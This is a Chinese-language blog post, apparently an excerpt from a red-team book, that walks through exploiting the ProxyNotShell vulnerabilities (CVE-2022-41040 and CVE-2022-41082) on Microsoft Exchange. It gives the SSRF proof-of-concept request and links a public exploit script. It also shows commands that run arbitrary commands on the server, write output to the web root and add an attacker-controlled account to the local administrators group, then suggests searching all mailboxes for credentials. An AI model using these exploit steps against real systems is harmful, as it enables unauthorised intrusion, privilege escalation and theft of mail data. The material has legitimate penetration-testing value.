您的位置:首页 > 科技 > 能源 > 内网域森林之ProxyNotShell漏洞利用

内网域森林之ProxyNotShell漏洞利用

2024/12/23 8:47:34 来源:https://blog.csdn.net/shuteer_xu/article/details/140925031  浏览:    关键词:内网域森林之ProxyNotShell漏洞利用

点击星标,即时接收最新推文

360729f308373efce6f97ca8a77f2739.png

本文选自《内网安全攻防:红队之路》

在渗透测试过程,如果目标环境存在Exchange服务器,我们也需要测试是否存在已知的远程命令执行漏洞,这里首先介绍ProxyNotShell。   

ProxyNotShell和之前的ProxyShell一样,也是将几个漏洞组合起来使用,分别为CVE-2022-41040和CVE-2022-41082。

ProxyNotShell利用链的第一个漏洞为CVE-2022-41040,该漏洞为Exchange Autodiscover前端中的一个无需认证的SSRF漏洞,攻击者可利用该漏洞以LocalSystem权限向后端的任意URL发送数据。下面为POC:

GET /autodiscover/autodiscover.json?@zdi/PowerShell?serializationLevel=Full;ExchClientVer=15.2.922.7;clientApplication=ManagementShell;TargetServer=;PSVersion=5.1.17763.592&Email=autodiscover/autodiscover.json%3F@zdi HTTP/1.1
Host: 192.168.3.12
Authorization: Basic ZGF2ZTpQYXNzdzByZEAwMg==
Connection: close

ProxyNotShell利用链的第二个漏洞为CVE-2022-41082,是存在于Exchange PowerShell后端的远程代码执行漏洞。在利用CVE-2022-41040绕过认证后,攻击者可利用CVE-2022-41082执行任意命令。

我们可以使用nmap脚本扫描目标服务器是否存在漏洞,如下图所示,脚本地址为https://github.com/CronUp/Vulnerabilidades/blob/main/proxynotshell_checker.nse:

38ddd9d7272701d81bcb389c236de5a8.png

扫描ProxyNotShell

下图输出表明目标服务器可能存在ProxyNotShell漏洞。接下来,我们进行具体的利用,PoC地址为https://github.com/testanull/ProxyNotShell-PoC(因为部分代码是从其他项目直接复制的,使用的是python2的print语法,如果使用python3运行脚本,需要修改print)。利用的前提是需要一个有效的账户和密码。

pip install requests_ntlm2 requests
python3 proxynotshell.py https://192.168.3.12 dave Passw0rd@02 'ipconfig > c:\inetpub\wwwroot\aspnet_client\ipconfig.txt'
curl -k https://192.168.3.12/aspnet_client/ipconfig.txt

cc5bcbd17d15c4d0d4ba37bba64e1227.png

ProxyNotShell利用

从下图可以看到我们成功在目标服务执行命令。我们也可以将我们控制的用户添加到目标服务器的本地管理员组:

python3 proxynotshell.py https://192.168.3.12 dave Passw0rd@02 'net localgroup administrators dev\dave /add'

f5f41412298c4c6a4be04bfa8eaea1f2.png

ProxyNotShell添加管理员

在获得邮件服务器权限后,我们可以搜索所有邮件,来查找是否存在账户密码信息,或者其他高价值数据,也可以利用Exchange默认的一些组成员关系进行权限提升。

—  实验室旗下直播培训课程  —

81aa06591037adc0ac5859d51c3d23ec.png

2fe8440317d99f4f36ffe8535d1fa8df.jpeg

a56512df6db5defb5f977b1b7c9217d5.jpegc76fabfae30de51473db2cf2292c5b01.png

cea28a8276d964c8ff59eff21a2fc6c9.png

5735b6af594aa394db945fd302882bf5.jpeg

4dae689e6b82bf29ff9a894985cbee6f.jpeg

f8f1cddf3583156348d7b517c7b084ce.jpeg

82bb1b32950efadb49254fbea6d27bbb.png

和20000+位同学加入MS08067一起学习

e0fa9fc1f56507a978fd0fb0d2c13bf9.gif